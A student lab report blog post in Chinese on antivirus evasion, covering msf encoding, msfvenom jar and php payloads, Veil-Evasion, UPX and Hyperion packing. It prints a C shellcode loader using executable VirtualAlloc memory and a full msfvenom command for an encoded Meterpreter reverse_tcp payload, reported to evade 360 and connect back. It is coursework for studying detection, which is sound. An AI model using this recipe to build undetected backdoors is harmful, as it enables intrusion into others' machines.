免杀原理与实践

一、实验原理

1.恶意软件的检测机制

基于特征码的检测:

特征码即一段或多段数据,包含这样数据的可执行文件或其他库、脚本被认为是恶意代码。

基于启发式恶意软件检测:

根据片面特征推断,通用的、多特征、非精确的扫描。

基于行为的恶意软件检测:

启发式的一种,加入了行为监控。

2.免杀技术

  • 改变特征码
    • 如果你手里只有EXE
      • 加壳:压缩壳 加密壳
    • 有shellcode(像Meterpreter)
      • 用encode进行编码
      • 基于payload重新编译生成可执行文件
    • 有源代码
      • 用其他语言进行重写再编译(veil-evasion)
  • 改变行为
    • 通讯方式
      • 尽量使用反弹式连接
      • 使用隧道技术
      • 加密通讯数据
    • 操作模式
      • 基于内存操作
      • 减少对系统的修改
      • 加入混淆作用的正常功能代码

二、实验内容

(一)正确使用msf编码器

1.使用msf编码器生成exe文件

使用实验二中的后门程序20174301_backdoor.exe,在VirusTotal网站扫描。

 可见被杀软检测到的概率很大。

2.使用msf编码器对后门程序编码

一次编码,结果如图:

在网站上检测结果如图:

 十次编码,结果如图:

 

 在网站上检测结果如图:

 

 由上可见,使用msf多次编码对提升免杀效果没什么用。

(二)使用msfvenom生成如jar之类的其他文件

1.jar文件

使用命令生成jar文件,如图:

 在网站上检测结果如图:

 2.php文件

生成过程如图:

 在网站上检测结果如图:

 出人意料的少(流汗

(三)使用veil生成后门程序

安装veil过程漫长,出现Unable to fetch some archives, maybe run apt-get update or try with --fix-missing的错误,请参见:https://blog.csdn.net/vslyu/article/details/82959552

虽然慢,但建议不要更新国内的源,可能出现更多错误,出现问题根据错误提示来调整吧。安装成功界面如下:

 输入veil,出现一下界面:

 输入ues evasion,进入veil-evasion

 输入 use c/meterpreter/rev_tcp进入配置界面

 设置反弹连接,设置文件名为veil_c_4301,其中LHOST为kali的IP,意为后门程序需要反弹连接的IP地址,如图:

 

 在网站上检测后门程序,其中,后门文件存放位置见上图,检测结果如图:

 (四)使用C+shellcode编程

利用msf生成一段shellcode,创建一个.c文件,用vi命令编辑文件,加入shellcode和一段主函数,主函数如下:

int main()
{ 
int (*func)() = (int(*)())buf;
func();
}

生成shellcode如下:

 将.c文件编译成可执行文件,如图:

 在网站检测结果如图:

 使用nc命令将文件传送到windows上,被360查杀:

 (五)加壳工具

1.压缩壳

使用upx命令将刚刚的可执行文件加壳,前面是加壳前文件,后面是加壳后文件,如图:

在网站上检测结果如图:

2.加密壳

使用Hyperion加密后门文件,其中安装Hyperion的过程参考其他同学给出的链接:https://blog.csdn.net/weixin_36711901/article/details/103217022

其中,要注意的是:

①可以使用 find -name 文件名 来查找Hyperion-2.2文件夹及Crpter文件夹、makefile文件,修改makefile文件是使用vi命令修改的;

②要加壳的文件要放进Hyperion-2.2文件夹里。

然后使用如下命令加壳即可。


 (六)使用其他课堂未介绍的方法

1.使用veil-evasion的其他载荷生成后门

进入veil evasion后,输入list查看载荷,选择第29个载荷,并不是每一个载荷都可用,界面如图:

 

如上图,set username以设置用户名,选择MSFVenom,选择组件/平台/连接方式,反弹连接IP和端口号,还可以自定义一些参数。

其中,后门文件名称是xn_zh_4301.rc。

在网站上检测结果如图:

2.shellcode+c++msf多次编码+加壳+申请动态内存加载(用另一台电脑实测,可以实现免杀并回连)

电脑系统:WIndows10专业版

AV:360安全卫士12

申请动态加载内存的代码如下:

#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口

unsigned char buf[] = 
"shellcode";


main()

{
    char *Memory; 

    Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    memcpy(Memory, buf, sizeof(buf));

    ((void(*)())Memory)();

}

使用 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f c -o shell.c 生成一段shellcode,然后把前面buf[]的值换成这段shellcode,生成的.c文件我用codeblocks编译成exe文件,再加壳,可实现免杀及回连成功。

 

 

(七)通过组合应用各种技术实现恶意代码免杀

见(六)的第2条。

(八)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

见(六)的第2条。

三、基础问题回答

  1.杀软是如何检测出恶意代码的?

   杀软可以通过特征码、行为特征检测出恶意代码。AV软件厂商搜集恶意代码的特征码库,与软件进行匹配,检测数据包的特征码,防止网络攻击;根据软件的特征与恶意软件特征的相符程度,监控软件行为,以查杀网络攻击。

  2.免杀是做什么?

   免杀就是通过encode编码、加壳、veil、shellcode编程等方式改变恶意代码的特征码,或通过反弹连接、加密通信、隧道技术等方法隐匿恶意代码的行为方式,或一些非常规方法使得安插的后门难以被AV软件发现。

  3.免杀的基本方法有哪些?

(1)改变特征码

EXE文件可以加壳、用encode进行编码;shellcode可以基于payload重新编译生成可执行文件;有源代码可以用其他语言进行重写再编译。

(2)改变行为方式

尽量使用反弹式连接、隧道技术、加密通讯数据等。

四、实践总结与体会

1.实验体会

此次实验模拟了生成后门软件实现免杀的过程,可以看出网络攻击是防不胜防的,应该加强网络安全防范意识。

2.开启杀软能绝对防止电脑中恶意代码吗?

不能,就比如纯手工打造的恶意代码,很难被杀毒软件检测出来。

posted @ 2020-04-02 09:58  小糯诺诺  阅读(241)  评论(0编辑  收藏